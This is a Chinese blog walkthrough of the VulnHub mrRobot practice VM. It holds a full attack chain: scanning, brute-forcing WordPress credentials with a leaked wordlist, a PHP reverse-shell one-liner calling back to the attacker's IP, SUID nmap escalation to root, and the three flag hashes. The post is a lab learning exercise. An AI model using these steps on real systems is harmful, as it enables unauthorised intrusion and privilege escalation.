vulnhub-mrRobot靶机的测试报告

于 2024-10-01 10:15:00 发布
阅读量453 收藏 5
点赞数 21
分类专栏: vulnhub靶机 文章标签: 网络安全 web安全 网络攻击模型 bash linux 前端框架 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79698171/article/details/142664889
版权

目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、信息搜集

2、渗透网页

3、Getshell

4、提权

四、结论

一、测试环境

1、系统环境

渗透机:kali2021.1(192.168.202.134)

靶  机:linux 3.13.0-55-generic #94-Ubuntu SMP

2、使用工具/软件

Kali:arp-scan(主机探测)、nmap(端口服务扫描)、dirsearch(目录扫描)、burp suite(爆破用户名和密码)、nc(反弹shell连接)

测试网址:http://192.168.202.146

二、测试目的

渗透mrRobot靶机,找到三个txt文件,分别是:key-1-of-3.txt、key-2-of-3.txt和key-3-of-3.txt。通过字典泄露,爆破出用户名和密码,在后台中写入反弹shell的后门getshell,利用nmap的root权限,成功root权限

三、操作过程

1、信息搜集

找到靶机的IP地址:192.168.202.146

arp-scan -l

Nmap扫描靶机开放的端口和服务

nmap -sS -A -T4 -p- 192.168.202.146

扫描发现22端口关闭了,看来这个靶场不能进行ssh登录了

只能从web入手了,http和https页面提供内容是一样的

扫描web目录

是用dirsearch扫的,用gobuster必须加字典,字典太大了,用dirsearch扫常用目录即可

dirsearch -u http://192.168.202.146/ -i 200,301 --exclude-sizes=0B

发现这是wordpress

2、渗透网页

Wordpress默认账密登不上去,甚至是没有admin用户,看来是将admin用户删除了,有一定安全意识,那么弱口令看来是不大可能了

网站主页面的游戏,尝试了也没有什么收获,只回复命令,或者播放视频,没有什么有用的信息

查看下扫到的敏感目录文件

Intro页面是一个视频,看起来是网页资源;robots.txt文件,和靶机名字有些相似

Robots.txt文件用于指示搜索引擎爬虫哪些网站页面可以或不能被索引。

通常有disallow或者allow的前缀,后面是指定目录

果然有些发现,这里有其中一个key的目录和一个fsocity.dic的文件

查看key-1-of-3.txt文件,得到第一个key1:073403c8a58a1f80d943455fb30724b9

访问这个fsocity.dic文件,发现是一行行分开的,联想到dic的后缀名,这个格式,想到这应该是个字典

将字典保存为dict.txt文件,可以爆破的地方只有一个wordpress了

Wordpress有个特点,找回密码的页面可以输入用户名找回,这里可以枚举出存在的用户名,只给用户名添加变量即可

足足有85万条数据。。。。,吓人的数据量了。。这尝试爆一个数据就要一个下午。

不过,靶场作者还是放水的,数据中有大量的重复数据,这里爆破发现1w条左右就会有重复数据出现,只要对数据进行去重,相信字典并没有实际的那么大

 

Python去重脚本如下:

去重得到的result.txt,大小直接小了79倍,哈哈;现在爆破起来就轻松多了

爆破出了elliot

尝试一下,果然跳转页面了,这是一个用户名

然后在登录页面爆破密码试试,这次给密码加爆破变量就行,字典还选result.txt

爆破结果:ER28-0652

尝试wordpress登录,成功登录!

用户名:elliot

密码:ER28-0652

3、Getshell

拿到wordpress的用户管理界面

可以通过修改页面内容进行访问;
思路是:添加反弹shell脚本,然后进行访问,进行反弹shell连接,可以得到shell;由于wordpress就是php写的后端,因此,找一个可修改并访问的php页面即可;

先修改一下wordpress的中文

Settings==》general==》language

在外观的编辑中,看到了很多php文件,直接修改404页面的源代码并保存试试

添加反弹shell成功!

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.202.134/666 0>&1'"); ?>

尝试kali反弹shell连接

nc -lvvp 666

网页端访问404页面

http://192.168.202.146/wp-admin/404.php

成功getshell!

4、提权

进行常规漏洞点寻找,没有收获

查找suid权限文件时,看到有nmap;

早期nmap版本中,有交互模式,允许用户执行shell命令,可以用来提权
提权命令总结网站:

nmap | GTFOBins

版本:nmap2.02至5.21    这里版本是3.81,符合提权条件

利用suid提权成功!nmap执行shell将以root身份运行

/usr/local/bin/nmap –interactive   

!sh

现在查找一下另外两个key

find / -name 'key-2-of-3.txt' 2>/dev/null
find / -name 'key-3-of-3.txt' 2>/dev/null

查看两个key,分别是:

Key2:822c73956184f694993bede3eb39f959

Key3:04787ddef27c3dee1ee161b21670b4e4

四、结论

放在公网的Web资源一定要谨慎检查,不能有用户名和密码泄露,这样降低了系统安全性。特殊权限的文件如Suid权限的文件的一定管理好,不能有nmap这样的可用来提权的文件,避免对系统造成危害。

ccc_9wy
关注
专栏目录
2024年软件测试最新看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot 1(1),已获千赞
2401_84141304的博客
05-07 415
【代码】2024年软件测试最新看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot 1(1),已获千赞。
最全看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot 1,2024年最新软件测试开发应该了解的Binder原理
2401_84563933的博客
05-11 430
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagIntermediate(中级的)
Vulnhub之mrRobot
weixin_42075643的博客
04-28 457
Vulnhub是一个很好的靶机平台,想看官网点这里 今天学习mrRobot,点击这里下载哦~ 这个比较简单,入门学习… VMware和VirtualBox都可以导入 成功后如图: 这里启用NAT模式 攻击机 kali 192.168.81.140 靶机:192.168.81.146 这个时候继续拿出祖传的nmap神器扫描: nmap -A 192.168.81.146 有80、443,直接浏览器访问: 继续看看有啥有价值的 先用dirsearch扫一下目录: 通过扫描发现是一个wp博客
Vulnhub_Mr-Root靶机渗透测试
m0_66225311的博客
09-08 118
Vulnhub_Mr-Root靶机渗透测试
Mr-robot靶机练习详解
weixin_45597678的博客
07-09 533
下载靶机使用虚拟机打开,打靶目标获取三个key文件 靶机下载地址:https://www.vulnhub.com/entry/mr-robot-1,151/ 1.首先对局域网进行主机扫描,命令nmap 192.168.1.1/24,发现目标主机192.168.127.140打开端口有22、80、443 2.浏览网站查看情况,看到一个命令行的界面自动使用root用户登录但是用户可以使用的命令被限制了都是一些没什么用的命令,其他的命令全部不能使用 3.使用burp对目标网站进行目录爬虫发现在网站下面有一个r
看完这篇教你玩转靶机 MR-ROBOT: 1
清唪的博客
03-27 5381
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤。 靶机下载: 官网:https://download.vulnhub.com/mrrobot/mrRobot.ovahttps://download.vulnhub.com/mrrobot/mrRobot.ova
Mr.Robot靶机 - 机器人先生
Ms08067安全实验室
03-02 2251
本文作者:恩格尔-src小组﹀﹀﹀靶机简介:靶机主题来自美剧《黑客军团》,这是一部传达极客精神和黑客文化的上佳作品,不同于《硅谷》的搞笑风格,这部剧的主角Eliot患有精神分裂,整部剧的...
靶机渗透测试(Mr-Robot: 1)
@小张小张的博客
11-05 1250
靶机渗透测试(Mr-Robot: 1): Vulnhub靶机 Mr-Robot: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(beginner-intermediate.) 目标:This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find 进
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
Aluxian_的博客
10-23 718
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagIntermediate(中级的)1.信息收集工具得使用2.CMS框架登入后 反弹shell3.nmap提权,md5解密🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
渗透入门Mr-robott靶机练习.doc
07-09
渗透测试靶机Mr-Robot实践指南 渗透测试是一种网络安全测试,旨在评估计算机系统或网络的安全性。作为一名渗透测试员,需要掌握各种技术和工具来检测和利用系统漏洞。下面是Mr-Robot靶机的实践指南,旨在帮助初学者...
VulnHub--mrrobot
记录笔记
07-06 891
Vulnhub靶场--Mr robot 靶机
VulnHub-MrRobot靶机渗透记录
Ve99tr’s Blog
04-01 618
MrRobot是一个WEB方向的初学者-中级靶机,一共有三个Key,难度逐级增加,适合学习者了解渗透过程,积累渗透经验
Vulnhub系列-mrRobot
Yasso的博客
12-26 2477
靶机:192.168.12.129 kali: 192.168.12.128 一、信息收集 nmap -sV 192.168.12.129 –扫描开放端口 dirsearch -u http://192.168.12.129/ –扫下web目录 –robots.txt和wordpress登录框– 得到第一个key fsocity.dic打开是个字典,猜测可以用来爆破wordpress登录框 –bp抓包,fsocity当作字典–—80多万。。。。。。— 可以确定用户名是Elliot,那用户名不用爆了(
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8482
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全详解
weidl001的博客
09-21 1543
网络安全(Cybersecurity)是指保护网络系统、设备、程序及数据免受攻击、损坏或未授权访问的实践。其核心目标是确保信息的机密性、完整性和可用性。机密性(Confidentiality):确保信息仅被授权的人员访问。完整性(Integrity):保护信息不被未授权的修改或破坏。可用性(Availability):确保信息和资源在需要时可被访问和使用。
国产操作系统(统信UOS)网络安全等级保护基础安全加固
2401_84434570的博客
09-26 934
统一操作系统UOS是由多家企业共同打造的中文国产操作系统。一、设置口令复杂度策略和有效期首先安装libpam-pwquality依赖包口令复杂度策略通过libpam-pwquality依赖包进行设置依赖包的安装命令:sudo apt-get install libpam-pwquality。依赖包的查看方式执行命令:dpkg -l libpam-pwquality。执行命令:vim etc/pam.d/common-passwd。
网络安全全方略
AI逍遥子
09-25 1333
网络安全全方略是一个系统化、全面化的过程,涉及策略制定、技术实施、管理流程、技术维护和文化建设等多个方面。通过构建一个全方位、多层次的网络安全防护体系,可以有效保护网络系统、数据和服务免受各种威胁,保业务的连续性和数据的完整性。
19、网络安全合规复盘
weixin_43263566的博客
09-26 223
信息安全工程师(24)网络安全体系建设原则与安全策略
最新发布
m0_73399576的博客
09-28 1088
信息安全工程师——网络安全体系建设原则与安全策略篇
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ccc_9wy

觉得写的好的话就赏杯奶茶喝吧~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值